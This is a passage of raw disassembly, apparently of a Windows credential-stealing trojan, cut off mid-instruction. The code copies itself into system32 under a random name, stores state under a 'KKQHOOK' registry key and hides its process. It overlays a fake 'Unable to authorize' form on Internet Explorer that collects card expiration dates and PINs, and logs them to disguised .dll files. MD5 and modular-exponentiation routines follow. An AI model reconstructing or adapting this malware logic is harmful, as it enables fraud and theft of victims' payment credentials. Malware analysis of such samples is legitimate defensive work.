GlobalAddAtomA mov eax, [ebp+arg_0] mov ds:dword_409008, eax mov ds:dword_408F40, 94h push offset dword_408F40 call sub_4079CC ; GetVersionExA push 0FFh push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" call sub_40799C ; GetSystemDirectoryA call sub_4079B4 ; GetTickCount push eax call sub_407E4C push 104h lea eax, [ebp+var_438] push eax push [ebp+arg_0] call sub_40796C ; GetModuleFileNameA and [ebp+var_5C], 0 mov [ebp+var_43C], 4 lea eax, [ebp+var_748] push eax lea eax, [ebp+var_43C] push eax lea eax, [ebp+var_5C] push eax push offset aKkqhook ; "KKQHOOK" push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401326 add esp, 1Ch mov [ebp+var_440], eax or eax, eax jz short loc_406456 cmp [ebp+var_5C], 1Ch jbe short loc_40644C push 1 call sub_407DEC pop ecx loc_40644C: ; CODE XREF: sub_406344+FEj cmp [ebp+var_5C], 1Ch jz loc_40653A loc_406456: ; CODE XREF: sub_406344+F8j call sub_407E28 mov edx, 10624DD3h mov ecx, eax imul edx sar edx, 7 sar ecx, 1Fh sub edx, ecx mov edi, edx add edi, 41h mov ebx, edi mov [ebp+var_2D], bl mov [ebp+var_1], 1 jmp short loc_4064A3 ; --------------------------------------------------------------------------- loc_40647C: ; CODE XREF: sub_406344+164j call sub_407E28 movzx edi, [ebp+var_1] mov edx, 10624DD3h mov ecx, eax imul edx sar edx, 7 sar ecx, 1Fh sub edx, ecx mov ebx, edx add ebx, 61h mov [ebp+edi+var_2D], bl add [ebp+var_1], 1 loc_4064A3: ; CODE XREF: sub_406344+136j mov al, [ebp+var_1] cmp al, 8 jbe short loc_40647C mov [ebp+var_25], 0 call sub_407E28 mov edx, eax test dl, 1 jnz short loc_4064C2 mov [ebp+var_27], 33h mov [ebp+var_26], 32h loc_4064C2: ; CODE XREF: sub_406344+174j lea eax, [ebp+var_2D] push eax push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS_exe ; "%s\\%s.exe" lea eax, [ebp+var_264] push eax call sub_407E40 push 0 lea eax, [ebp+var_264] push eax lea eax, [ebp+var_438] push eax call sub_407A20 ; CopyFileA lea eax, [ebp+var_2D] push eax call sub_40284A mov [ebp+var_5C], 1Ch push 4 push 4 lea eax, [ebp+var_5C] push eax push offset aKkqhook ; "KKQHOOK" push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401379 add esp, 2Ch push 0 lea eax, [ebp+var_264] push eax call sub_407B34 ; WinExec call sub_402B0D push 1 call sub_407918 ; ExitProcess loc_40653A: ; CODE XREF: sub_406344+10Cj push offset aKkq32_dll ; "kkq32.dll" push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS ; "%s\\%s" push offset dword_409020 call sub_407E40 push offset aDnkkq_dll ; "dnkkq.dll" push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS ; "%s\\%s" push offset dword_408120 call sub_407E40 push offset aDatkkq32_dll ; "datkkq32.dll" push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS ; "%s\\%s" push offset dword_408010 call sub_407E40 push 0FFh push offset dword_408A40 call sub_4079E4 ; GetWindowsDirectoryA push offset aBoot_sys ; "\\boot.sys" push offset dword_408A40 call sub_407E64 lea eax, aKkqhook ; "KKQHOOK" mov [ebp+var_31], eax mov eax, ds:dword_409008 mov [ebp+var_45], eax lea eax, sub_4068A8 mov [ebp+var_51], eax push 7F00h push 0 call sub_407BD0 ; LoadCursorA mov [ebp+var_3D], eax push 7F03h push 0 call sub_407BDC ; LoadIconA mov [ebp+var_41], eax and [ebp+var_35], 0 push 0 call sub_407CD8 ; GetStockObject mov [ebp+var_39], eax mov [ebp+var_55], 3 and [ebp+var_4D], 0 and [ebp+var_49], 0 lea eax, [ebp+var_55] push eax call sub_407BF4 ; RegisterClassA push 0 push ds:dword_409008 push 0 push 0 push 0 push 0 push 0 push 0 push 0CA0000h push offset aKkqhook ; "KKQHOOK" push offset aKkqhook ; "KKQHOOK" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_408FE4, eax push offset aKkqhook_28 ; "KKQHOOK_28" push 0 push 0 call sub_407AD4 ; CreateMutexA push 2 call sub_401EAF add esp, 3Ch call sub_4079C0 ; GetVersion cmp eax, 80000000h jb short loc_40667D push offset aKernel32_dll_1 ; "kernel32.dll" call sub_407978 ; GetModuleHandleA push offset aRegisterservic ; "RegisterServiceProcess" push eax call sub_407990 ; GetProcAddress mov [ebp+var_750], eax call sub_40793C ; GetCurrentProcessId push 1 push eax call [ebp+var_750] loc_40667D: ; CODE XREF: sub_406344+30Ej push 104h lea eax, [ebp+var_544] push eax push 0 call sub_40796C ; GetModuleFileNameA lea eax, [ebp+var_544] push eax call sub_4024E0 push offset dword_409020 call sub_4024E0 push offset dword_408120 call sub_4024E0 push offset dword_408010 call sub_4024E0 call sub_40793C ; GetCurrentProcessId push eax call sub_402613 lea eax, [ebp+var_2C8] push eax call sub_4026EE and [ebp+var_330], 0 mov [ebp+var_334], 64h lea eax, [ebp+var_330] push eax lea eax, [ebp+var_334] push eax lea eax, [ebp+var_32C] push eax lea eax, [ebp+var_2C8] push eax push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"... push 80000002h call sub_401326 push offset aK ; "K" lea eax, [ebp+var_32C] push eax call sub_402638 push offset aV ; "V" lea eax, [ebp+var_2C8] push eax call sub_402638 lea eax, [ebp+var_32C] push eax push offset aClsidSInprocse ; "CLSID\\%s\\InProcServer32" lea eax, [ebp+var_742] push eax call sub_407E40 lea eax, [ebp+var_330] push eax lea eax, [ebp+var_334] push eax lea eax, [ebp+var_643] push eax push 0 lea eax, [ebp+var_742] push eax push 80000000h call sub_401326 lea eax, [ebp+var_643] push eax call sub_4024E0 call sub_402784 push offset sub_404FCE call sub_404F53 add esp, 6Ch lea eax, [ebp+var_74C] push eax push 0 push 0 push offset sub_405AAC push 0 push 0 call sub_407B64 ; CreateThread push eax call sub_407984 ; CloseHandle push 0 push 1F4h push 1 push ds:dword_408FE4 call sub_407BE8 ; SetTimer jmp short loc_4067D4 ; --------------------------------------------------------------------------- loc_4067C2: ; CODE XREF: sub_406344+4A1j lea eax, [ebp+var_1D] push eax call sub_407C54 ; TranslateMessage lea eax, [ebp+var_1D] push eax call sub_407C60 ; DispatchMessageA loc_4067D4: ; CODE XREF: sub_406344+47Cj push 0 push 0 push 0 lea eax, [ebp+var_1D] push eax call sub_407C0C ; GetMessageA or eax, eax jnz short loc_4067C2 pop edi pop esi pop ebx leave retn 10h sub_406344 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4067EE proc near ; DATA XREF: sub_40553F+4E0o ; sub_40553F+504o ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ebx push esi push edi mov edi, [ebp+arg_0] mov eax, [ebp+arg_4] cmp eax, 100h jnz short loc_406853 cmp [ebp+arg_8], 9 jnz short loc_406853 cmp edi, ds:dword_40861C jnz short loc_40681A push ds:dword_419150 call sub_407BB8 ; SetFocus loc_40681A: ; CODE XREF: sub_4067EE+1Fj cmp edi, ds:dword_419150 jnz short loc_40682D push ds:dword_409000 call sub_407BB8 ; SetFocus loc_40682D: ; CODE XREF: sub_4067EE+32j cmp edi, ds:dword_409000 jnz short loc_406840 push ds:dword_408FF8 call sub_407BB8 ; SetFocus loc_406840: ; CODE XREF: sub_4067EE+45j cmp edi, ds:dword_408FF8 jnz short loc_406853 push ds:dword_419150 call sub_407BB8 ; SetFocus loc_406853: ; CODE XREF: sub_4067EE+11j ; sub_4067EE+17j ... xor esi, esi cmp edi, ds:dword_419150 jnz short loc_406863 mov esi, ds:dword_409010 loc_406863: ; CODE XREF: sub_4067EE+6Dj cmp edi, ds:dword_409000 jnz short loc_406871 mov esi, ds:dword_408FFC loc_406871: ; CODE XREF: sub_4067EE+7Bj cmp edi, ds:dword_40861C jnz short loc_40687F mov esi, ds:dword_408000 loc_40687F: ; CODE XREF: sub_4067EE+89j cmp edi, ds:dword_408FF8 jnz short loc_40688D mov esi, ds:dword_408A1C loc_40688D: ; CODE XREF: sub_4067EE+97j or esi, esi jz short loc_4068A1 push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push edi push esi call sub_407CCC ; CallWindowProcA loc_4068A1: ; CODE XREF: sub_4067EE+A1j pop edi pop esi pop ebx pop ebp retn 10h sub_4067EE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4068A8 proc near ; DATA XREF: sub_406344+270o var_238 = dword ptr -238h var_234 = dword ptr -234h var_230 = dword ptr -230h var_22C = dword ptr -22Ch var_228 = dword ptr -228h var_224 = dword ptr -224h var_220 = dword ptr -220h var_21C = dword ptr -21Ch var_218 = dword ptr -218h var_214 = dword ptr -214h var_210 = byte ptr -210h var_20B = byte ptr -20Bh var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_101 = byte ptr -101h var_100 = byte ptr -100h var_FF = byte ptr -0FFh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 238h push ebx push esi push edi mov eax, [ebp+arg_4] cmp eax, 10h jz loc_406A0D jg short loc_4068D0 cmp eax, 2 jz loc_4069F3 jmp loc_406E27 ; --------------------------------------------------------------------------- loc_4068D0: ; CODE XREF: sub_4068A8+18j cmp eax, 111h jz loc_406AC6 cmp eax, 113h jz short loc_4068FD cmp eax, 111h jl loc_406E27 cmp eax, 138h jz loc_406A28 jmp loc_406E27 ; --------------------------------------------------------------------------- loc_4068FD: ; CODE XREF: sub_4068A8+38j cmp dword_41A1F8, 0 jz loc_4069C9 push offset aDocobject ; "DocObject" push dword_41A1F8 call sub_4054DD mov [ebp+var_214], eax push offset aExplorer ; "Explorer" push eax call sub_4054DD add esp, 10h mov [ebp+var_218], eax lea eax, [ebp+var_228] push eax push [ebp+var_218] call sub_407B88 ; GetWindowRect or eax, eax jz short loc_4069C9 lea eax, [ebp+var_238] push eax push ds:dword_409124 call sub_407B88 ; GetWindowRect or eax, eax jz short loc_4069C9 mov eax, [ebp+var_220] sub eax, [ebp+var_228] sub eax, 4 mov edx, [ebp+var_230] sub edx, [ebp+var_238] cmp eax, edx jnz short loc_40699E mov eax, [ebp+var_21C] sub eax, [ebp+var_224] sub eax, 4 mov edx, [ebp+var_22C] sub edx, [ebp+var_234] cmp eax, edx jz short loc_4069C9 loc_40699E: ; CODE XREF: sub_4068A8+D5j push 1 mov eax, [ebp+var_21C] sub eax, [ebp+var_224] push eax mov eax, [ebp+var_220] sub eax, [ebp+var_228] push eax push 0 push 0 push ds:dword_409124 call sub_407CB4 ; MoveWindow loc_4069C9: ; CODE XREF: sub_4068A8+5Cj ; sub_4068A8+A0j ... cmp dword_41A1F4, 0 jz loc_406E38 mov eax, dword_41A1F4 mov dword_41A1F8, eax and dword_41A1F4, 0 push eax call sub_40553F pop ecx jmp loc_406E38 ; --------------------------------------------------------------------------- loc_4069F3: ; CODE XREF: sub_4068A8+1Dj mov eax, ds:dword_408FE4 cmp [ebp+arg_0], eax jnz loc_406E38 push 0 call sub_407C84 ; PostQuitMessage jmp loc_406E38 ; --------------------------------------------------------------------------- loc_406A0D: ; CODE XREF: sub_4068A8+12j mov eax, ds:dword_408FE4 cmp [ebp+arg_0], eax jnz loc_406E38 push [ebp+arg_0] call sub_407CA8 ; DestroyWindow jmp loc_406E38 ; --------------------------------------------------------------------------- loc_406A28: ; CODE XREF: sub_4068A8+4Aj mov eax, [ebp+arg_C] mov [ebp+var_10C], eax cmp eax, ds:dword_419148 jz short loc_406A65 cmp eax, ds:dword_408A20 jz short loc_406A65 cmp eax, ds:dword_408FDC jz short loc_406A65 cmp eax, ds:dword_419360 jz short loc_406A65 cmp eax, ds:dword_41914C jz short loc_406A65 cmp eax, ds:dword_419368 jnz loc_406E38 loc_406A65: ; CODE XREF: sub_4068A8+18Fj ; sub_4068A8+197j ... mov eax, [ebp+var_10C] cmp eax, ds:dword_41914C jz short loc_406A7B cmp eax, ds:dword_419368 jnz short loc_406A8A loc_406A7B: ; CODE XREF: sub_4068A8+1C9j push 1010B0h push [ebp+arg_8] call sub_407CF0 ; SetTextColor jmp short loc_406A94 ; --------------------------------------------------------------------------- loc_406A8A: ; CODE XREF: sub_4068A8+1D1j push 0 push [ebp+arg_8] call sub_407CF0 ; SetTextColor loc_406A94: ; CODE XREF: sub_4068A8+1E0j push 0FFFFFFh push [ebp+arg_8] call sub_407CE4 ; SetBkColor and [ebp+var_220], 0 and [ebp+var_21C], 0 lea eax, [ebp+var_220] push eax call sub_407CFC ; CreateBrushIndirect mov [ebp+var_214], eax jmp loc_406E38 ; --------------------------------------------------------------------------- loc_406AC6: ; CODE XREF: sub_4068A8+2Dj push offset byte_419260 push offset aS_0 ; "%s" lea eax, [ebp+var_20B] push eax call sub_407E40 add esp, 0Ch push 0FFh lea eax, [ebp+var_FF] push eax push ds:dword_419150 call sub_407B7C ; GetWindowTextA cmp [ebp+var_FF], 0 jnz short loc_406B1F push 0 push 0 push offset aPleaseSelectEx ; "Please, select Expiration Month" push 0 call sub_407C00 ; MessageBoxA push ds:dword_419150 call sub_407BB8 ; SetFocus jmp loc_406E38 ; --------------------------------------------------------------------------- loc_406B1F: ; CODE XREF: sub_4068A8+255j lea eax, [ebp+var_FF] push eax lea eax, [ebp+var_20B] push eax push offset aSS_0 ; "%s %s" lea eax, [ebp+var_20B] push eax call sub_407E40 add esp, 10h push 0FFh lea eax, [ebp+var_FF] push eax push ds:dword_409000 call sub_407B7C ; GetWindowTextA cmp [ebp+var_FF], 0 jnz short loc_406B81 push 0 push 0 push offset aPleaseSelect_0 ; "Please, select Expiration Year" push 0 call sub_407C00 ; MessageBoxA push ds:dword_409000 call sub_407BB8 ; SetFocus jmp loc_406E38 ; --------------------------------------------------------------------------- loc_406B81: ; CODE XREF: sub_4068A8+2B7j lea eax, [ebp+var_FF] push eax lea eax, [ebp+var_20B] push eax push offset aSS_1 ; "%s-%s" lea eax, [ebp+var_20B] push eax call sub_407E40 add esp, 10h push 0FFh lea eax, [ebp+var_FF] push eax push ds:dword_408FF8 call sub_407B7C ; GetWindowTextA cmp [ebp+var_FF], 0 jz loc_406CBE lea ecx, [ebp+var_FF] or eax, 0FFFFFFFFh loc_406BD0: ; CODE XREF: sub_4068A8+32Dj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_406BD0 cmp eax, 4 jb loc_406CBE mov [ebp+var_101], 0 jmp short loc_406C0B ; --------------------------------------------------------------------------- loc_406BE9: ; CODE XREF: sub_4068A8+37Cj movzx eax, [ebp+var_101] mov al, [ebp+eax+var_FF] cmp al, 30h jl short loc_406BFF cmp al, 39h jle short loc_406C04 loc_406BFF: ; CODE XREF: sub_4068A8+351j jmp loc_406CBE ; --------------------------------------------------------------------------- loc_406C04: ; CODE XREF: sub_4068A8+355j add [ebp+var_101], 1 loc_406C0B: ; CODE XREF: sub_4068A8+33Fj lea ecx, [ebp+var_FF] or eax, 0FFFFFFFFh loc_406C14: ; CODE XREF: sub_4068A8+371j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_406C14 movzx ebx, [ebp+var_101] cmp ebx, eax jb short loc_406BE9 mov [ebp+var_100], 0 jmp short loc_406C9D ; --------------------------------------------------------------------------- loc_406C2F: ; CODE XREF: sub_4068A8+40Ej mov al, [ebp+var_100] mov byte ptr [ebp+var_214+3], al jmp short loc_406C66 ; --------------------------------------------------------------------------- loc_406C3D: ; CODE XREF: sub_4068A8+3D7j movzx eax, byte ptr [ebp+var_214+3] movsx eax, [ebp+eax+var_FF] movzx edx, [ebp+var_100] movsx edx, [ebp+edx+var_FF] cmp eax, edx jnz short loc_406C81 add byte ptr [ebp+var_214+3], 1 loc_406C66: ; CODE XREF: sub_4068A8+393j lea ecx, [ebp+var_FF] or eax, 0FFFFFFFFh loc_406C6F: ; CODE XREF: sub_4068A8+3CCj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_406C6F movzx ebx, byte ptr [ebp+var_214+3] cmp ebx, eax jb short loc_406C3D loc_406C81: ; CODE XREF: sub_4068A8+3B5j movzx eax, byte ptr [ebp+var_214+3] movzx edx, [ebp+var_100] sub eax, edx cmp eax, 3 jg short loc_406CBE add [ebp+var_100], 1 loc_406C9D: ; CODE XREF: sub_4068A8+385j lea ecx, [ebp+var_FF] or eax, 0FFFFFFFFh loc_406CA6: ; CODE XREF: sub_4068A8+403j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_406CA6 movzx ebx, [ebp+var_100] cmp ebx, eax jb loc_406C2F jmp short loc_406CEC ; --------------------------------------------------------------------------- loc_406CBE: ; CODE XREF: sub_4068A8+319j ; sub_4068A8+332j ... push 7D0h call sub_407DC8 pop ecx push 0 push offset aUnableToAuth_0 ; "Unable to authorize" push offset aUnableToAuth_1 ; "Unable to authorize - INCORRECT PIN. Pl"... push 0 call sub_407C00 ; MessageBoxA push ds:dword_408FF8 call sub_407BB8 ; SetFocus jmp loc_406E38 ; --------------------------------------------------------------------------- loc_406CEC: ; CODE XREF: sub_4068A8+414j lea eax, [ebp+var_FF] push eax lea eax, [ebp+var_20B] push eax push offset aSS_0 ; "%s %s" lea eax, [ebp+var_20B] push eax call sub_407E40 add esp, 10h push 0 push 0 push 4 push 0 push 0 push 40000000h push offset dword_409020 call sub_407A8C ; CreateFileA mov [ebp+var_108], eax push 2 push 0 push 0 push eax call sub_407ABC ; SetFilePointer lea ecx, [ebp+var_20B] or eax, 0FFFFFFFFh loc_406D42: ; CODE XREF: sub_4068A8+49Fj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_406D42 push 0 lea ebx, [ebp+var_210] push ebx push eax lea esi, [ebp+var_20B] push esi push [ebp+var_108] call sub_407B40 ; WriteFile push 0 lea eax, [ebp+var_210] push eax push 2 push offset asc_424CEC ; "\r\n" push [ebp+var_108] call sub_407B40 ; WriteFile push [ebp+var_108] call sub_407984 ; CloseHandle push ds:dword_409124 call sub_407CA8 ; DestroyWindow push 0 push 0 push 4 push 0 push 0 push 40000000h push offset dword_408120 call sub_407A8C ; CreateFileA mov [ebp+var_108], eax push 2 push 0 push 0 push [ebp+var_108] call sub_407ABC ; SetFilePointer lea ecx, byte_419260 or eax, 0FFFFFFFFh loc_406DCF: ; CODE XREF: sub_4068A8+52Cj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_406DCF mov esi, eax push 0 lea ebx, [ebp+var_210] push ebx push esi push offset byte_419260 push [ebp+var_108] call sub_407B40 ; WriteFile push 0 lea eax, [ebp+var_210] push eax push 1 push offset byte_4244C8 push [ebp+var_108] call sub_407B40 ; WriteFile push [ebp+var_108] call sub_407984 ; CloseHandle push 5 push ds:dword_408FEC call sub_407C90 ; ShowWindow jmp short loc_406E38 ; --------------------------------------------------------------------------- loc_406E27: ; CODE XREF: sub_4068A8+23j ; sub_4068A8+3Fj ... push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_407CC0 ; DefWindowProcA loc_406E38: ; CODE XREF: sub_4068A8+128j ; sub_4068A8+146j ... pop edi pop esi pop ebx leave retn 10h sub_4068A8 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E40 proc near ; CODE XREF: sub_4043B0+15p ; sub_4043B0+25p jmp ds:dword_426334 sub_406E40 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E4C proc near ; CODE XREF: sub_4034AD+7Bp jmp ds:dword_426340 sub_406E4C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E58 proc near ; CODE XREF: sub_4034AD+C9p jmp ds:dword_426344 sub_406E58 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E64 proc near ; CODE XREF: sub_404184+43p jmp ds:dword_426350 sub_406E64 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E70 proc near ; CODE XREF: sub_404184+23p jmp ds:dword_426354 sub_406E70 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E7C proc near ; CODE XREF: sub_404184+15p jmp ds:dword_426358 sub_406E7C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_406E88 proc near ; CODE XREF: sub_40414B+30p jmp ds:dword_42635C sub_406E88 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_406E94 proc near ; CODE XREF: sub_405336+13p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp pusha cld mov edi, [ebp+arg_4] mov eax, 1 stosd mov ecx, 0Fh dec eax rep stosd lea edi, dword_425448 mov esi, [ebp+arg_0] mov ecx, 10h rep movsd mov edi, [ebp+arg_8] call sub_406F5F xor edx, edx loc_406EC4: ; CODE XREF: sub_406E94+52j push edx push ebx mov eax, [ebp+arg_8] bt [eax], edx jnb short loc_406ED6 mov edx, [ebp+arg_4] call sub_406EF0 loc_406ED6: ; CODE XREF: sub_406E94+38j lea edx, dword_425448 call sub_406EF0 pop ebx pop edx inc edx cmp edx, ebx jbe short loc_406EC4 popa pop ebp retn 10h sub_406E94 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_406EF0 proc near ; CODE XREF: sub_406E94+3Dp ; sub_406E94+48p lea edi, dword_425408 mov ecx, 10h xor eax, eax rep stosd lea edi, dword_425448 call sub_406F5F loc_406F0A: ; CODE XREF: sub_406EF0+5Dj lea edi, dword_425408 mov ecx, 10h xor eax, eax loc_406F17: ; CODE XREF: sub_406EF0+2Cj rcl dword ptr [edi], 1 lea edi, [edi+4] loop loc_406F17 call sub_406F70 bt dword_425448, ebx jnb short loc_406F4C mov esi, edx lea edi, dword_425408 xor eax, eax mov ecx, 10h loc_406F3B: ; CODE XREF: sub_406EF0+55j mov eax, [esi] adc [edi], eax lea esi, [esi+4] lea edi, [edi+4] loop loc_406F3B call sub_406F70 loc_406F4C: ; CODE XREF: sub_406EF0+3Aj dec ebx jns short loc_406F0A mov edi, edx lea esi, dword_425408 mov ecx, 10h rep movsd retn sub_406EF0 endp ; =============== S U B R O U T I N E ======================================= sub_406F5F proc near ; CODE XREF: sub_406E94+29p ; sub_406EF0+15p mov ebx, 1FFh loc_406F64: ; CODE XREF: sub_406F5F+Bj bt [edi], ebx jb short locret_406F6C dec ebx jnz short loc_406F64 locret_406F6C: ; CODE XREF: sub_406F5F+8j retn sub_406F5F endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_406F70 proc near ; CODE XREF: sub_406EF0+2Ep ; sub_406EF0+57p lea esi, dword_425408 mov edi, [ebp+14h] mov ecx, 0Fh loc_406F7E: ; CODE XREF: sub_406F70+19j mov eax, [esi+ecx*4] cmp eax, [edi+ecx*4] jb short locret_406FA7 ja short loc_406F8B dec ecx jns short loc_406F7E loc_406F8B: ; CODE XREF: sub_406F70+16j mov esi, [ebp+14h] lea edi, dword_425408 xor eax, eax mov ecx, 10h loc_406F9B: ; CODE XREF: sub_406F70+35j mov eax, [esi] sbb [edi], eax lea esi, [esi+4] lea edi, [edi+4] loop loc_406F9B locret_406FA7: ; CODE XREF: sub_406F70+14j retn sub_406F70 endp ; =============== S U B R O U T I N E ======================================= sub_406FA8 proc near ; CODE XREF: sub_406FF9+32p ; sub_406FF9+50p ... mov eax, ebx and eax, ecx push ebx not ebx and ebx, edx or eax, ebx pop ebx retn sub_406FA8 endp ; =============== S U B R O U T I N E ======================================= sub_406FB5 proc near ; CODE XREF: sub_406FF9+219p ; sub_406FF9+238p ... mov eax, ebx and eax, edx push edx not edx and edx, ecx or eax, edx pop edx retn sub_406FB5 endp ; =============== S U B R O U T I N E ======================================= sub_406FC2 proc near ; CODE XREF: sub_406FF9+420p ; sub_406FF9+43Fp ... mov eax, ebx xor eax, ecx xor eax, edx retn sub_406FC2 endp ; =============== S U B R O U T I N E ======================================= sub_406FC9 proc near ; CODE XREF: sub_406FF9+627p ; sub_406FF9+645p ... mov eax, edx not eax or eax, ebx xor eax, ecx retn sub_406FC9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_406FD2 proc near ; CODE XREF: sub_405350+58p arg_0 = dword ptr 8 push ebp mov ebp, esp pusha mov edi, [ebp+arg_0] mov dword ptr [edi], 67452301h mov dword ptr [edi+4], 0EFCDAB89h mov dword ptr [edi+8], 98BADCFEh mov dword ptr [edi+0Ch], 10325476h popa pop ebp retn 4 sub_406FD2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_406FF9 proc near ; CODE XREF: sub_405350+69p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp pusha mov edi, [ebp+arg_0] mov esi, [ebp+arg_4] mov eax, [edi] mov dword_425488, eax mov eax, [edi+4] mov dword_42548C, eax mov eax, [edi+8] mov dword_425490, eax mov eax, [edi+0Ch] mov dword_425494, eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FA8 add eax, [edi] add eax, [esi] add eax, 0D76AA478h rol eax, 7 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FA8 add eax, [edi+0Ch] add eax, [esi+4] add eax, 0E8C7B756h rol eax, 0Ch add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FA8 add eax, [edi+8] add eax, [esi+8] add eax, 242070DBh rol eax, 11h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FA8 add eax, [edi+4] add eax, [esi+0Ch] add eax, 0C1BDCEEEh rol eax, 16h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FA8 add eax, [edi] add eax, [esi+10h] add eax, 0F57C0FAFh rol eax, 7 add eax, [edi+4] mov [edi], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FA8 add eax, [edi+8] add eax, [esi+18h] add eax, 0A8304613h rol eax, 11h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FA8 add eax, [edi+4] add eax, [esi+1Ch] add eax, 0FD469501h rol eax, 16h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FA8 add eax, [edi] add eax, [esi+20h] add eax, 698098D8h rol eax, 7 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FA8 add eax, [edi+0Ch] add eax, [esi+24h] add eax, 8B44F7AFh rol eax, 0Ch add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FA8 add eax, [edi+8] add eax, [esi+28h] add eax, 0FFFF5BB1h rol eax, 11h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FA8 add eax, [edi+4] add eax, [esi+2Ch] add eax, 895CD7BEh rol eax, 16h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FA8 add eax, [edi] add eax, [esi+30h] add eax, 6B901122h rol eax, 7 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FA8 add eax, [edi+0Ch] add eax, [esi+34h] add eax, 0FD987193h rol eax, 0Ch add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FA8 add eax, [edi+8] add eax, [esi+38h] add eax, 0A679438Eh rol eax, 11h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FA8 add eax, [edi+4] add eax, [esi+3Ch] add eax, 49B40821h rol eax, 16h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FB5 add eax, [edi] add eax, [esi+4] add eax, 0F61E2562h rol eax, 5 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FB5 add eax, [edi+0Ch] add eax, [esi+18h] add eax, 0C040B340h rol eax, 9 add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FB5 add eax, [edi+8] add eax, [esi+2Ch] add eax, 265E5A51h rol eax, 0Eh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FB5 add eax, [edi+4] add eax, [esi] add eax, 0E9B6C7AAh rol eax, 14h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FB5 add eax, [edi] add eax, [esi+14h] add eax, 0D62F105Dh rol eax, 5 add eax, 